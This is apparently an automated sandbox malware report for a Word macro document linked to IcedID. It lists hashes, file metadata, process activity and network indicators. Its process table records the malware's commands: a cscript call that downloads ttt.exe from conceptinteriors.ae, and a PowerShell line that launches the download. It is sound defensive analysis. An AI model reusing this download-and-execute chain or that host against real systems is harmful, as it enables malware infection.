analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2020-03-27-Word-doc-with-macro-for-IcedID.bin

Full analysis: https://app.any.run/tasks/a6b43b96-9c68-40a0-b7d1-76f8a5967cbd
Verdict: Malicious activity
Analysis date: March 30, 2020, 21:21:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
macros-on-close
maldoc-3
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

BB1F29916D4C7CCC1E4931E309087017

SHA1:

36521883685512B5FC5138FE6E82F940142EA0BF

SHA256:

8C70BFE95C8909258E32A38AB754CA9EAC9FC144E315F30592EA9B6D9F6638C7

SSDEEP:

3072:LpXZGlvSYndc9yi7DK7kTV9MUqOfjLnUe0vO2XMdDSix+gPgxGXh+Mn4swT+S:9XUlvznti7G74UofjLWW2XCzxCGXL4s+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3232)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3232)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1356)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2348)
    • Executes application which crashes

      • powershell.exe (PID: 2348)
    • Executes scripts

      • cmd.exe (PID: 1356)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3232)
    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3232)
    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 3232)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3232)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XML

AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: SPecialiST RePack
TitlesOfParts: -
HeadingPairs:
  • Название
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: 2.0 days
Template: Normal.dotm
ModifyDate: 2020:03:26 11:25:00Z
CreateDate: 2020:03:24 10:37:00Z
RevisionNumber: 126
LastModifiedBy: Пользователь Windows

XMP

Creator: Windows User

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 2011
ZipCompressedSize: 484
ZipCRC: 0xe9ce927d
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
5
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe cmd.exe no specs cscript.exe powershell.exe no specs ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3232"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2020-03-27-Word-doc-with-macro-for-IcedID.bin.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1356cmd /c ""C:\User_Foto\Soterios.bat" "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3240cscript //nologo c:\User_Foto\Transfer.vbs http://conceptinteriors.ae/ttt.exe C:\User_Foto\Jili#$Ma.exeC:\Windows\system32\cscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2348powershell -C Sleep -s 6;Saps 'C:\User_Foto\Jili#$Ma.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2540"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
255
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
18 456
Read events
7 965
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
5
Text files
192
Unknown types
4

Dropped files

PID
Process
Filename
Type
3232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR68F3.tmp.cvr
MD5:
SHA256:
3232WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\config14[1].xml
MD5:
SHA256:
3232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CabE7AA.tmp
MD5:
SHA256:
3232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\TarE7AB.tmp
MD5:
SHA256:
3232WINWORD.EXEC:\User_Foto\Soterios2
MD5:
SHA256:
3232WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48DAF017.jpeg
MD5:
SHA256:
3232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF46C9973EF743C3FF.TMP
MD5:
SHA256:
3232WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF5DA5F39FC4617E73.TMP
MD5:
SHA256:
3232WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6Fbinary
MD5:19D5C2114646EF140E0C517C76060D80
SHA256:F6FADC6FE3033DCF7E29430F20238D3B875FEF048B80CB8B8356B8E79AAED872
3232WINWORD.EXEc:\User_Foto\Soterios.battext
MD5:BF537D8DDD344ED1ABBEF6466C96403B
SHA256:833D0802856BD63783C8F1A66C9FB3C162342A339185D9C975DBD320378C063A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3232
WINWORD.EXE
GET
200
52.109.76.6:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023
IE
xml
1.99 Kb
whitelisted
3232
WINWORD.EXE
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAtqs7A%2Bsan2xGCSaqjN%2FrM%3D
US
der
1.47 Kb
whitelisted
3240
cscript.exe
GET
302
162.241.24.233:80
http://conceptinteriors.ae/ttt.exe
US
html
305 b
suspicious
3240
cscript.exe
GET
200
162.241.24.233:80
http://conceptinteriors.ae/cgi-sys/suspendedpage.cgi
US
html
7.42 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3232
WINWORD.EXE
52.109.76.6:80
office14client.microsoft.com
Microsoft Corporation
IE
whitelisted
3232
WINWORD.EXE
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
3232
WINWORD.EXE
52.109.8.27:443
rr.office.microsoft.com
Microsoft Corporation
US
whitelisted
3240
cscript.exe
162.241.24.233:80
conceptinteriors.ae
CyrusOne LLC
US
suspicious

DNS requests

Domain
IP
Reputation
office14client.microsoft.com
  • 52.109.76.6
whitelisted
rr.office.microsoft.com
  • 52.109.8.27
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
conceptinteriors.ae
  • 162.241.24.233
suspicious

Threats

PID
Process
Class
Message
3240
cscript.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
No debug info